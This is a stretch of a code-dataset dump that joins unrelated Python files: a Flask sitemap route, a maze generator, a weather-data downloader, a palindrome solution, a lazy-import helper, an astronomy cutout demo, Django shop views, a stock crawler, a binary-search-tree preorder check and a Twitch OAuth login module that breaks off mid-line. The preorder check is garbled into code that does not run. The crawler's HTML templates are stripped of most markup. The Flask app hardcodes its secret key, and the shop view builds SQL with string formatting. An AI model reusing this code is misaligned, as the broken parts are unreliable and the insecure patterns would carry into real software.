render_template('500.html', ERROR=ERROR)\n\n\n\"\"\"------------------\"\"\"\n\"\"\" Google analytics \"\"\"\n\"\"\"------------------\"\"\"\n\n\n# Generate a sitemap for SearchEngineOptimization\n@app.route('/sitemap.xml', methods=['GET'])\ndef sitemap():\n try:\n \"\"\"Generate sitemap.xml. 
Makes a list of urls and date modified.\"\"\"\n pages = []\n ten_days_ago = (datetime.now() - timedelta(days=7)).date().isoformat()\n # static pages\n for rule in app.url_map.iter_rules():\n if \"GET\" in rule.methods and len(rule.arguments) == 0:\n # pages.append ['server_domain' + str(rule, rule), ten_days_ago])\n pages.append(\n [\"http://173.169.201.187\" + str(rule.rule),\n ten_days_ago])\n sitemap_xml = render_template('sitemap_template.xml', pages=pages)\n response = make_response(sitemap_xml)\n response.headers[\"Content-Type\"] = \"application/xml\"\n return response\n except Exception as ERROR:\n #flash(str(ERROR)) # debug output\n return render_template('500.html', ERROR=ERROR)\n\n\nif __name__ == '__main__':\n app.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\n app.run()","sub_path":"FlaskApp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251572747","text":"import random\n\nclass maze_maker:\n \"\"\"\n ダンジョンを自動生成する\n \"\"\"\n\n def __init__(self,MAZE_W,MAZE_H):\n self.MAZE_W = MAZE_W\n self.MAZE_H = MAZE_H\n self.maze = [[0]*self.MAZE_W for y in range(self.MAZE_H)]\n self.DUNGEON_W = MAZE_W*3\n self.DUNGEON_H = MAZE_H*3\n self.dungeon = [[0]*self.DUNGEON_W for y in range(self.DUNGEON_H)]\n\n def make_maze(self):\n \"\"\"\n 迷路を作る\n \"\"\"\n XP = [ 0, 1, 0,-1]\n YP = [-1, 0, 1, 0]\n\n #周囲の柱\n for x in range(self.MAZE_W):\n self.maze[0][x] = 1\n self.maze[self.MAZE_H-1][x] = 1\n for y in range(self.MAZE_H):\n self.maze[y][0] = 1\n self.maze[y][self.MAZE_W-1] = 1\n\n #中を空っぽに\n for y in range(1,self.MAZE_H-1):\n for x in range(1,self.MAZE_W-1):\n self.maze[y][x] = 0\n\n #柱\n for y in range(2,self.MAZE_H-2,2):\n for x in range(2,self.MAZE_W-2,2):\n self.maze[y][x] = 1\n\n for y in range(2,self.MAZE_H-2,2):\n for x in range(2,self.MAZE_W-2,2):\n d = random.randint(0,3)\n if x > 2:\n d = random.randint(0,2)\n self.maze[y+YP[d]][x+XP[d]] = 1\n\n def make_dungeon(self):\n \"\"\"\n 迷路からダンジョンを作る\n \"\"\"\n self.make_maze()\n for y in range(self.DUNGEON_H):\n for x in range(self.DUNGEON_W):\n self.dungeon[y][x] = 9\n for y in range(1,self.MAZE_H-1):\n for x in range(1,self.MAZE_W-1):\n dx = x*3+1\n dy = y*3+1\n if self.maze[y][x] == 0:\n if random.randint(0,99) < 20:\n for ry in range(-1,2):\n for rx in range(-1,2):\n self.dungeon[dy+ry][dx+rx] = 0\n else:\n self.dungeon[dy][dx] = 0\n if self.maze[y-1][x] == 0:\n self.dungeon[dy-1][dx] = 0\n if self.maze[y+1][x] == 0:\n self.dungeon[dy+1][dx] = 0\n if self.maze[y][x-1] == 0:\n self.dungeon[dy][dx-1] = 0\n if self.maze[y][x+1] == 0:\n self.dungeon[dy][dx+1] = 0\n\n\n def put_event(self):\n while True:\n x = random.randint(3,self.DUNGEON_W-4)\n y = random.randint(3,self.DUNGEON_H-4)\n if(self.dungeon[y][x] == 0):\n for ry in range(-1,2):\n for rx in range(-1,2):\n self.dungeon[y+ry][x+rx] = 0\n self.dungeon[y][x] = 1\n break\n for i in range(60):\n x = random.randint(3,self.DUNGEON_W-4)\n y = random.randint(3,self.DUNGEON_H-4)\n if(self.dungeon[y][x] == 0):\n self.dungeon[y][x] = random.choice([2,3,3,3,4])\n","sub_path":"maze_maker.py","file_name":"maze_maker.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"317523804","text":"#!/usr/bin/env python3\n\"\"\"\nScript used to download and format my training and test sets.\nOnly tested with:\nPython 3.5.2\nPandas 0.17.1\n\"\"\"\n\nimport requests\nimport 
pandas\nfrom functools import partial\nfrom io import StringIO\n\ntemplate = r'http://avaa.tdata.fi/palvelut/smeardata.jsp?variables={variablenames}&table=HYY_META&from={startyear}-01-01 00:00:00.000&to={endyear}-01-01 00:00:00.000&quality=ANY&averaging=30MIN&type=ARITHMETIC'\n\nstartyear = 2000\nendyear = 2016\n\ntestyear = 2016\n\n#Because it also takes the very first measurement of the next year.\nendyear = endyear + 1 \n\nvariables = {\"T504\": \"T lower\", \"T672\":\"T\", \"Pamb0\":\"Air pressure\", \"Net\":\"Net radiation\"}\n\n#this determines the order of the received data columns\nvariablestring = \"T504,T672,Pamb0,Net\"\n\n#It is not a large service, so trying to download too much would be inconsiderate\n#The API is subject to change, and has already done so once during this project work\n \nrequest = template.format(**{\"variablenames\":variablestring, \"startyear\":startyear, \"endyear\":endyear})\nprint(request)\n\nresponse = requests.get(request)\n\n#well, not much we can do if there is an HTTP code other than success\nif response.status_code != 200:\n raise ValueError(\"HTTP status code abnormal: \" + str(response.status_code))\n\n#save data in current folder in case we find trouble later\nwith open(\"./raw_avaa.csv\", \"w\") as outfile:\n outfile.write(response.text)\n\ndatabuffer = StringIO(response.text)\n#read into pandas dataframe, the date_parser seems somewhat inelegant, but does the job.\ndate_format = \"%Y %m %d %H %M %S\"\nfull_data = pandas.read_csv(databuffer, parse_dates={\"Time\":[\"Year\", \"Month\", \"Day\", \"Hour\", \"Minute\", \"Second\"]}, date_parser=partial(pandas.to_datetime, format=date_format), index_col='Time')\n\n#The original column names could work as well, but referring to things as tablename.variablename is a bit annoying\n#None of the data I use has a . 
in the variablename.\ndef drop_table_name(name):\n if name.startswith(\"HYY_META\"):\n return variables[name.split(\".\")[1]]\n else:\n return name\n \nfull_data.rename(columns=drop_table_name, inplace=True)\n\n#Clean rows where any of the values are missing (because the model is useless there)\n\nfull_data.dropna(inplace=True)\n\n#create new variables fraction of day [0,1), fraction of year [0,~1)\nfull_data['day fraction'] = pandas.Series((full_data.index.hour + full_data.index.minute/60.0)/24.0, index=full_data.index)\n#I don't really care that on leap years this a bit over 1.\nfull_data['year fraction'] = full_data.index.dayofyear/365.0\n\n#split off test year\ntest_data = full_data[full_data.index.year == testyear]\ntraining_data = full_data[full_data.index.year != testyear]\n\n#store for training script\ntraining_data.to_csv(\"./training_data.csv\")\ntest_data.to_csv(\"./test_data.csv\")\n","sub_path":"load_sets_from_AVAA.py","file_name":"load_sets_from_AVAA.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"483480175","text":"#\n# @lc app=leetcode id=409 lang=python3\n#\n# [409] Longest Palindrome\n#\n\n# @lc code=start\nclass Solution:\n def longestPalindrome(self, s: str) -> int:\n if len(s) == 0:\n return 0\n dictionary = {}\n for char in s:\n if char not in dictionary:\n dictionary[char] = 1\n else:\n dictionary[char] += 1\n odd = 0\n for item in dictionary:\n odd += (dictionary[item] % 2)\n if odd == 0:\n return len(s)\n return len(s) - odd + 1\n\n# @lc code=end\n\n","sub_path":"code/409.longest-palindrome.py","file_name":"409.longest-palindrome.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"507849610","text":"\"\"\"\n.. module:: parmenides.lazy\n :platform: any\n :synopsis: lazy implementation of Python functionality\n\n.. moduleauthor:: Jacob Collard \n\nIn some cases it is necessary to have a value that acts like an object of a\ncertain type, but does not import code from other packages until later on in\nthe program. In particular, it is often desirable to instantiate an object of a\nclass without importing that class, which may be dependent on global\nconfiguration values not yet set. For this reason, ``parmenides.lazy`` provides\nthe :class:`parmenides.lazy.LazyObject` class, which allows for the lazy\ninitialization of Python objects. Similarly, :class:`parmenides.lazy.LazyClass`\nprovides functionality for lazily importing a class.\n\"\"\"\n\nclass LazyObject(object):\n \"\"\"\n :param name: the dotted path to the Python class to instantiate\n :type name: str\n :param *args: the positional arguments to be passed when the class is\n initialized\n :param **kwargs: the keyword arguments to be passed when the class is\n initialized\n\n A ``LazyObject`` is a lazy implementation of Python object initialization.\n That is, a LazyObject acts like the initialization of a Python object, but\n only actually initializes the object when it is actually necessary to do\n so. \n\n Normally, initializing a Python object requires first importing the class,\n as below:\n\n >>> from mymodule import MyClass\n >>> myobj = MyClass(arg1, arg2, kwarg1=kwarg1, kwarg2=kwarg2)\n\n In some cases, this import can have unwanted side-effects not compatible\n with early program state. 
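(Aside, not part of this module: the deferred import that ``LazyObject`` performs can be sketched with nothing but the standard library. In the sketch below, ``resolve`` is a hypothetical helper and ``json.JSONDecoder`` merely a convenient stand-in target.)

```python
# Minimal sketch of an on-demand class import, stdlib only.
import importlib

def resolve(dotted_path):
    # 'json.JSONDecoder' -> import the 'json' module now, then
    # pull the 'JSONDecoder' attribute out of it.
    module_name, _, attr = dotted_path.rpartition('.')
    module = importlib.import_module(module_name)
    return getattr(module, attr)

Decoder = resolve('json.JSONDecoder')  # the import happens here, not at startup
print(Decoder().decode('{"a": 1}'))    # -> {'a': 1}
```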
``LazyObject``, however, does not require\n    actually importing the class, as in the example below:\n\n    >>> myobj = LazyObject('mymodule.MyClass', arg1, arg2, kwarg1=kwarg1,\n        kwarg2=kwarg2)\n    >>> # Now myobj can be used as an instance of mymodule.MyClass\n    >>> myobj.method()\n\n    A ``LazyObject`` acts like a normal object for many purposes, but not all.\n    For example, it is possible to call the object's methods and access its\n    values. However, the object's type remains ``LazyObject``. Also, the\n    following values are reserved in ``LazyObjects``: ``_name``, ``_args``,\n    ``_kwargs``, ``_evaluate`` and ``_instance``.\n    \"\"\"\n\n    def __init__(self, name, *args, **kwargs):\n\n        self._name = name\n        self._args = args\n        self._kwargs = kwargs\n        self._instance = None\n\n    def __getattr__(self, key):\n\n        try:\n            return getattr(self._instance, key)\n        except AttributeError:\n            # first access: import the target class and build the real instance\n            self._instance = self._evaluate()\n            return getattr(self._instance, key)\n\n    def _evaluate(self):\n\n        args = self._args\n        kwargs = self._kwargs\n\n        attrs = self._name.split('.')\n        module_name = '.'.join(attrs[:-1])\n        mod = __import__(module_name, fromlist=[attrs[-1]])\n        cls = getattr(mod, attrs[-1])\n\n        return cls(*args, **kwargs)\n\nclass LazyClass(object):\n    \"\"\"\n    A ``LazyClass`` makes it possible to lazily import a class. A ``LazyClass``\n    object generally acts identically to a class imported normally, with a few\n    exceptions. Most notably, the class cannot be used as an instance of\n    'type': type comparisons against the ``LazyClass`` will not work. However,\n    the class will be callable as usual to create instances of the class.\n    \"\"\"\n\n    def __init__(self, name):\n\n        self._name = name\n        self._class = None\n\n    def __getattr__(self, key):\n\n        try:\n            return getattr(self._class, key)\n        except AttributeError:\n            self._class = self._evaluate()\n            return getattr(self._class, key)\n\n    def _evaluate(self):\n\n        attrs = self._name.split('.')\n        module_name = '.'.join(attrs[:-1])\n        mod = __import__(module_name, fromlist=[attrs[-1]])\n        cls = getattr(mod, attrs[-1])\n\n        return cls\n\n    def __call__(self, *args, **kwargs):\n\n        if not self._class:\n            self._class = self._evaluate()\n\n        return self._class(*args, **kwargs)\n","sub_path":"parmenides/lazy.py","file_name":"lazy.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"218178043","text":"#!/usr/bin/python\n# -*- coding=utf-8 -*- \n\n# A demo program for PyVO\n# 1. \n# 2. \n# 3. Use the datalink and SODA to make a cutout on this image around the\n# galaxies we are interested in. 
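Stepping back for a moment to the LazyObject/LazyClass pair defined above: a short usage sketch. It assumes `parmenides.lazy` is importable and borrows the stdlib's `json.JSONDecoder` as a harmless target class; nothing here is part of the module itself.

```python
# Usage sketch for the two lazy wrappers; json.JSONDecoder is only a stand-in.
from parmenides.lazy import LazyObject, LazyClass

lazy_obj = LazyObject('json.JSONDecoder')    # nothing has been imported yet
print(lazy_obj.decode('[1, 2, 3]'))          # first attribute access imports and instantiates

LazyDecoder = LazyClass('json.JSONDecoder')  # the class itself is resolved on demand
print(LazyDecoder().decode('{"k": true}'))   # calling it builds a real JSONDecoder
```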
\n#\n# Make sure to have Aladin open and connected to the SAMP hub before\n# starting the script.\n#\n# Markus Demleitner and Hendrik Heinl\n# heinl@g-vo.org\n#\n\nimport pyvo\n\nimport tempfile\nimport contextlib\nimport os\nimport warnings\nimport sys\n\nfrom astropy import units as u\nfrom astropy.table import Table\nfrom astropy.io import votable\n \n\ndef get_single_radiosrc(ra,dec):\n    \"\"\"Get radio sources with a TAP query\"\"\"\n    \n    # Make the TAP service object\n    service = pyvo.dal.TAPService(\"https://vo.astron.nl/tap\")\n\n    # The ADQL query selects the data we need: the source identifier, the\n    # position (we need to know \"where\" to perform the cutout) and the\n    # length of the major axis, to define the size of the cutout.\n    # Looking into the errors in the positions, we give a bit of a\n    # tolerance to the selection.\n\n    query= \"\"\"\n    SELECT \n    lolss.source, lolss.ra, lolss.dec, lolss.maj_axis \n    FROM lolss.source_catalog AS lolss\n    WHERE DISTANCE (\n    POINT ('', lolss.ra, lolss.dec),\n    POINT ('', {pos_ra}, {pos_dec})\n    ) < 100./3600.\n    \"\"\".format(pos_ra=ra, pos_dec=dec)\n\n    # Run the query against the ASTRON service to obtain the source data\n    result = service.run_sync(\n        query=query,)\n\n    return result\n\n\n# PyVO won't let us send FITS image via samp, so here is the workaround\n# to make it do so!\n@contextlib.contextmanager\ndef accessible_binary(bytes, suffix=\".fits\"):\n    \"\"\"\n    a context manager making some bytes (typically: an image)\n    available with a URL for local SAMP clients.\n    \"\"\"\n    handle, f_name = tempfile.mkstemp(suffix=suffix)\n    with open(handle, \"wb\") as f:\n        f.write(bytes)\n    try:\n        yield \"file://\" + f_name\n    finally:\n        os.unlink(f_name)\n\n\n# To make the process callable from external scripts, we define a new\n# function which will also be called in the main loop. 
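Before that function appears, a quick illustration of the accessible_binary helper defined above; the bytes below are throwaway stand-ins, not a real FITS image, so only the temporary-URL round trip is exercised.

```python
# Exercise accessible_binary with dummy bytes (not a valid FITS file).
fake_fits = b"SIMPLE  =                    T"
with accessible_binary(fake_fits) as url:
    print(url)  # e.g. file:///tmp/tmpab12cd.fits, readable by local SAMP clients
# once the with-block exits, the temporary file has been unlinked again
```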
\n\ndef recipe(ra,dec):\n\n # get data about radio sources from ASTRON services\n radiosource=get_single_radiosrc(ra,dec)\n\n # make the service object of the ASTRON TAP service\n svc = pyvo.dal.TAPService(\"https://vo.astron.nl/tap\")\n \n\t# get the data of the lolss mosaic\n result = svc.run_sync(\"SELECT pubdid FROM lolss.mosaic\")\n\n # We only have one result; get the datalink object for it.\n dl = next(result.iter_datalinks())\n \n # Get \"the\" processing service in there \n soda_svc = dl.get_first_proc()\n\n # And now do the cutouts:\n for (oid, ra, dec, maj_axis) in radiosource.to_table():\n a=soda_svc.process(\n circle=[\n ra*u.deg, dec*u.deg, \n maj_axis/3600*u.deg]).read()\n \n # Send the cutout to Aladin \n with accessible_binary(a) as img_url:\n with pyvo.samp.connection() as conn:\n\n pyvo.samp.send_image_to(\n conn=conn, \n url=img_url, \n client_name=\"Aladin\")\n\n return \"OK\"\n\n\ndef main():\n # Keep the output of this example \"sane\".\n if not sys.warnoptions:\n warnings.simplefilter(\"ignore\")\n\n # If run standalone, run the whole process for this position.\n recipe (240.484, 46.768)\n\n\nif __name__==\"__main__\":\n main()\n\n","sub_path":"pysrc/example5/astron_smart_cutout.py","file_name":"astron_smart_cutout.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"653227024","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext, loader, Context\nfrom apps.shop.models import ModelProduct, Product, Cart, CartItem\nfrom apps.clients.models import Client\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom django.db import connection\nfrom . 
import dictfetchall\nimport json\n\n\n@login_required(login_url='/login')\n@csrf_protect\ndef cart(request):\n if \"active_cart\" in request.session:\n cart = get_object_or_404(Cart, pk=int(request.session[\"active_cart\"]))\n cursor = connection.cursor()\n cursor.execute(\"SELECT i.quantity, p.title, p.price FROM cart_items AS i, products AS p WHERE i.product_id = p.id AND cart_id = %d\" % cart.id)\n cart_products = dictfetchall(cursor)\n\n return render_to_response('cart.html', locals(), context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login')\n@csrf_protect\ndef shop(request):\n products_dict = dict()\n mproducts = ModelProduct.objects.filter(active=True)\n for mp in mproducts:\n products = Product.objects.filter(active=True, mp=mp)\n for pr in products:\n if mp.key() not in products_dict.keys():\n products_dict[mp.key()] = list()\n products_dict[mp.key()].append({'id': pr.id, 'title': pr.title, 'value': pr.value, 'price': pr.price, 'currency': pr.currency})\n\n return render_to_response('shop.html', locals(), context_instance=RequestContext(request))\n\n\n@login_required(login_url='/login')\n@csrf_protect\ndef to_cart(request):\n data = dict()\n if request.is_ajax():\n client = get_object_or_404(Client, user=request.user)\n if \"active_cart\" in request.session:\n cart = get_object_or_404(Cart, pk=int(request.session[\"active_cart\"]))\n else:\n cart = Cart.objects.create(client=client)\n request.session[\"active_cart\"] = cart.id\n\n product_id = int(request.POST.get('product', None))\n if cart.add_product(product_id):\n status = True\n else:\n status = False\n\n data = {'status': status}\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n","sub_path":"apps/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"310585890","text":"import csv\r\nimport time\r\nimport os.path\r\nimport threading\r\n\r\nimport requests as req\r\nfrom bs4 import BeautifulSoup\r\n\r\nfile_dir = os.path.dirname(os.path.realpath(__file__))\r\nHTML_TEMPLATE = '''\r\n\r\n\r\n\r\n \r\n \r\n \r\n Document\r\n \r\n\r\n\r\n
\r\n {}\r\n
\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {}\r\n \r\n
시각000510152025303540455055
\r\n
\r\n
\r\n \r\n
\r\n \r\n\r\n\r\n'''\r\nHTML_TEMPLATE2 = '''\r\n\r\n\r\n\r\n \r\n \r\n \r\n Document\r\n \r\n\r\n\r\n
\r\n {}\r\n
\r\n\r\n\r\n'''\r\n\r\n\r\nclass Worker:\r\n def __init__(self, url):\r\n self.url = url\r\n self.num = url.split('/')[-1]\r\n self.name = None\r\n self.stack = None\r\n self.image = None\r\n\r\n def load_stock(self):\r\n _header = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',\r\n }\r\n\r\n res = req.get(self.url, headers=_header)\r\n if res.status_code != 200:\r\n print(f'[{self.num}] HTTP Error: {res.status_code}')\r\n\r\n parser = BeautifulSoup(res.text, \"html.parser\")\r\n self.name = parser.find('meta', {'property': 'og:title'}).get('content').strip()\r\n self.stack = bool('out' not in parser.find('meta', {'property': 'og:availability'}).get('content').strip())\r\n self.image = parser.find('meta', {'property': 'og:images'}).get('content').strip().replace('/b/', '/l/')\r\n\r\n def write_csv(self):\r\n init = bool(not os.path.isfile(f'{file_dir}/data/{self.num}.csv'))\r\n\r\n with open(f'{file_dir}/data/{self.num}.csv', 'a', encoding='utf-8', newline='') as file:\r\n writer = csv.writer(file)\r\n\r\n if init:\r\n writer.writerow(['날짜', '시각', '재고'])\r\n\r\n writer.writerow([time.strftime('%m/%d'), time.strftime('%H:%M'), 'O' if self.stack else 'X'])\r\n\r\n def make_html(self):\r\n with open(f'{file_dir}/data/{self.num}.csv', 'r', encoding='utf-8', newline='') as file:\r\n reader = csv.DictReader(file)\r\n result = []\r\n temp = {}\r\n c_time = None\r\n b_time = None\r\n\r\n for row in reader:\r\n times = row['시각'].split(':')\r\n c_time = f\"{row['날짜']} {times[0]}시\"\r\n if b_time is not None and c_time != b_time:\r\n result.append([b_time, temp])\r\n temp = {}\r\n\r\n temp[times[1]] = row['재고']\r\n\r\n b_time = c_time\r\n\r\n result.append([b_time, temp])\r\n\r\n table = ''\r\n for e in result:\r\n text = f'{e[0]}'\r\n\r\n for i in range(0, 60, 5):\r\n data = e[1].get(f'{i:02}')\r\n\r\n if data is None:\r\n text += ''\r\n elif data == 'O':\r\n text += 'O'\r\n else:\r\n text += 'X'\r\n\r\n text += '\\n'\r\n\r\n table += text\r\n\r\n with open(f'{file_dir}/data/{self.num}.html', 'w', encoding='utf-8') as file:\r\n file.write(HTML_TEMPLATE.format(self.url, self.name, table))\r\n\r\n def main(self):\r\n self.load_stock()\r\n self.write_csv()\r\n self.make_html()\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n os.mkdir(f'{file_dir}/data')\r\n except FileExistsError:\r\n pass\r\n\r\n with open(f'{file_dir}/list.txt', 'r', encoding='utf-8') as file:\r\n products = [l.strip() for l in file.readlines()]\r\n\r\n workers = []\r\n for url in products:\r\n worker = Worker(url)\r\n workers.append(worker)\r\n th = threading.Thread(target=worker.main)\r\n th.start()\r\n\r\n while threading.active_count() > 1:\r\n time.sleep(0.05)\r\n\r\n with open(f'{file_dir}/products.html', 'w', encoding='utf-8') as file:\r\n grid = ''\r\n for worker in workers:\r\n grid += f'\\n'\r\n\r\n file.write(HTML_TEMPLATE2.format(grid))\r\n","sub_path":"크롤링 6:27회의/선재/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"211005826","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 9 08:35:28 2020\n\n@author: mahya\n\"\"\"\n\n\ndef canReperesentPBT(pre):\n \n root = 0\n s = []\n \n for element in pre:\n \n if element 0 and s[-1] < element):\n root = s.pop()\n \n s.append(element)\n \n return True\n\npre1 = [40 , 30 , 35 , 20 , 80 , 100]\npre2 = [40 , 30 , 35 , 20 , 80 , 
100]\n\nprint(canReperesentPBT(pre1))\nprint(canReperesentPBT(pre2))","sub_path":"PreorderBinaryTree.py","file_name":"PreorderBinaryTree.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"473658785","text":"import functools\nimport urllib.request\nimport urllib.parse\nimport uuid\n\nimport flask\nimport flask.json\n\nfrom common import utils\nfrom www import server\nfrom common.config import config, from_apipass\n\n# See https://github.com/justintv/Twitch-API/blob/master/authentication.md#scopes\n# We don't actually need, or want, any at present\nREQUEST_SCOPES = []\n\nSPECIAL_USERS = {\n\t'lrrbot': ['chat_login', 'user_read', 'user_follows_edit'],\n\t'loadingreadyrun': ['channel_subscriptions'],\n}\n\n# Needs to be the URI of this script, and also the registered URI for the app\nREDIRECT_URI = 'https://lrrbot.mrphlip.com/login'\n#REDIRECT_URI = 'http://localhost:5000/login'\n\ndef with_session(func):\n\t\"\"\"\n\tPass the current login session information to the function\n\n\tUsage:\n\t@server.app.route('/path')\n\t@with_session\n\tdef handler(session): # keyword argument must be \"session\"\n\t\t...\n\t\"\"\"\n\t@functools.wraps(func)\n\tdef wrapper(*args, **kwargs):\n\t\tkwargs['session'] = load_session()\n\t\treturn func(*args, **kwargs)\n\treturn wrapper\n\ndef with_minimal_session(func):\n\t\"\"\"\n\tPass the current login session information to the function\n\n\tDo not include extra session information, intended for master.html. Useful for\n\tplaces that need the current user id, but shouldn't (or don't need to) call\n\tbotinteract.\n\n\tUsage:\n\t@server.app.route('/path')\n\t@with_minimal_session\n\tdef handler(session):\n\t\t...\n\t\"\"\"\n\t@functools.wraps(func)\n\tdef wrapper(*args, **kwargs):\n\t\tkwargs['session'] = load_session(include_url=False, include_header=False)\n\t\treturn func(*args, **kwargs)\n\treturn wrapper\n\ndef require_login(func):\n\t\"\"\"\n\tLike with_session, but if the user isn't logged in,\n\tsend them via the login screen.\n\t\"\"\"\n\t@functools.wraps(func)\n\tdef wrapper(*args, **kwargs):\n\t\tsession = load_session()\n\t\tif session['user']:\n\t\t\tkwargs['session'] = session\n\t\t\treturn func(*args, **kwargs)\n\t\telse:\n\t\t\treturn login(session['url'])\n\treturn wrapper\n\ndef require_mod(func):\n\t\"\"\"\n\tLike with_session, but if the user isn't logged in,\n\tsend them via the login screen. 
If the user isn't\n\ta moderator, kick them out.\n\t\"\"\"\n\t@functools.wraps(func)\n\tdef wrapper(*args, **kwargs):\n\t\tsession = load_session()\n\t\tif session['user']:\n\t\t\tkwargs['session'] = session\n\t\t\tif session['header']['is_mod']:\n\t\t\t\treturn func(*args, **kwargs)\n\t\t\telse:\n\t\t\t\treturn flask.render_template('require_mod.html', session=session)\n\t\telse:\n\t\t\treturn login(session['url'])\n\treturn wrapper\n\ndef load_session(include_url=True, include_header=True):\n\t\"\"\"\n\tGet the login session information from the cookies.\n\n\tIncludes all the information needed by the master.html template.\n\t\"\"\"\n\tfrom www import botinteract\n\t# could potentially add other things here in the future...\n\tsession = {\n\t\t\"user\": flask.session.get('user'),\n\t}\n\tif 'apipass' in flask.request.values and flask.request.values['apipass'] in from_apipass:\n\t\tsession['user'] = from_apipass[flask.request.values[\"apipass\"]]\n\tif include_url:\n\t\tsession['url'] = flask.request.url\n\telse:\n\t\tsession['url'] = None\n\tif include_header:\n\t\tsession['header'] = botinteract.get_header_info()\n\treturn session\n\n@server.app.route('/login')\ndef login(return_to=None):\n\tif 'code' not in flask.request.values:\n\t\tif return_to is None:\n\t\t\treturn_to = flask.request.values.get('return_to')\n\t\tflask.session['login_return_to'] = return_to\n\n\t\tif 'as' in flask.request.values:\n\t\t\tif flask.request.values['as'] not in SPECIAL_USERS:\n\t\t\t\treturn utils.error_page(\"Not a recognised user name: %s\" % flask.request.values['as'])\n\t\t\tscope = SPECIAL_USERS[flask.request.values['as']]\n\t\telse:\n\t\t\tscope = REQUEST_SCOPES\n\n\t\t# Generate a random nonce so we can verify that the user who comes back is the same user we sent away\n\t\tflask.session['login_nonce'] = uuid.uuid4().hex\n\n\t\treturn flask.render_template(\"login.html\", clientid=config[\"twitch_clientid\"], scope=' '.join(scope), redirect_uri=REDIRECT_URI, nonce=flask.session['login_nonce'], session=load_session(include_url=False))\n\telse:\n\t\ttry:\n\t\t\t# Check that we're expecting the user to be logging in...\n\t\t\texpected_nonce = flask.session.pop('login_nonce', None)\n\t\t\tif not expected_nonce:\n\t\t\t\traise Exception(\"Not expecting a login here\")\n\n\t\t\ttwitch_state = flask.request.values.get('state', '')\n\t\t\t# We have to pack the \"remember me\" flag into the state parameter we send via twitch, since that's where the form points... 
awkward\n\t\t\tif ':' in twitch_state:\n\t\t\t\ttwitch_nonce, remember_me = twitch_state.split(':')\n\t\t\t\tremember_me = bool(int(remember_me))\n\t\t\telse:\n\t\t\t\t# User didn't have JS turned on, so remember me option not available\n\t\t\t\ttwitch_nonce = twitch_state\n\t\t\t\tremember_me = False\n\t\t\tif expected_nonce != twitch_nonce:\n\t\t\t\traise Exception(\"Nonce mismatch: %s vs %s\" % (expected_nonce, twitch_nonce))\n\n\t\t\t# Call back to Twitch to get our access token\n\t\t\toauth_params = {\n\t\t\t\t'client_id': config[\"twitch_clientid\"],\n\t\t\t\t'client_secret': config[\"twitch_clientsecret\"],\n\t\t\t\t'grant_type': 'authorization_code',\n\t\t\t\t'redirect_uri': REDIRECT_URI,\n\t\t\t\t'code': flask.request.values['code'],\n\t\t\t}\n\t\t\tres_json = urllib.request.urlopen(\"https://api.twitch.tv/kraken/oauth2/token\", urllib.parse.urlencode(oauth_params).encode()).read().decode()\n\t\t\tres_object = flask.json.loads(res_json)\n\t\t\tif not res_object.get('access_token'):\n\t\t\t\traise Exception(\"No access token from Twitch: %s\" % res_json)\n\t\t\taccess_token = res_object['access_token']\n\t\t\tgranted_scopes = res_object[\"scope\"]\n\n\t\t\t# Use that access token to get basic information about the user\n\t\t\treq = urllib.request.Request(\"https://api.twitch.tv/kraken/\")\n\t\t\treq.add_header(\"Authorization\", \"OAuth %s\" % access_token)\n\t\t\tres_json = urllib.request.urlopen(req).read().decode()\n\t\t\tres_object = flask.json.loads(res_json)\n\t\t\tif not res_object.get('token', {}).get('valid'):\n\t\t\t\traise Exception(\"User object not valid: %s\" % res_json)\n\t\t\tif not res_object.get('token', {}).get('user_name'):\n\t\t\t\traise Exception(\"No user name from Twitch: %s\" % res_json)\n\t\t\tuser_name = res_object['token']['user_name'].lower()\n\n\t\t\t# If this is one of our special users, store the access_token in the bot\n\t\t\t# for future use\n\t\t\t# If one of our special users logged in *without* using the \"as\" flag,\n\t\t\t# Twitch *might* remember them and give us the same permissions anyway\n\t\t\t# but if not, then we don't have the permissions we need to do our thing\n\t\t\t# so bounce them back to the login page with the appropriate scopes.\n\t\t\tif user_name in SPECIAL_USERS:\n\t\t\t\tif any(i not in granted_scopes for i in SPECIAL_USERS[user_name]):\n\t\t\t\t\tserver.app.logger.error(\"User %s has not granted us the required permissions\" % user_name)\n\t\t\t\t\tflask.session['login_nonce'] = uuid.uuid4().hex\n\t\t\t\t\treturn flask.render_template(\"login.html\", clientid=config[\"twitch_clientid\"], scope=' '.join(SPECIAL_USERS[user_name]), redirect_uri=REDIRECT_URI, nonce=flask.session['login_nonce'], 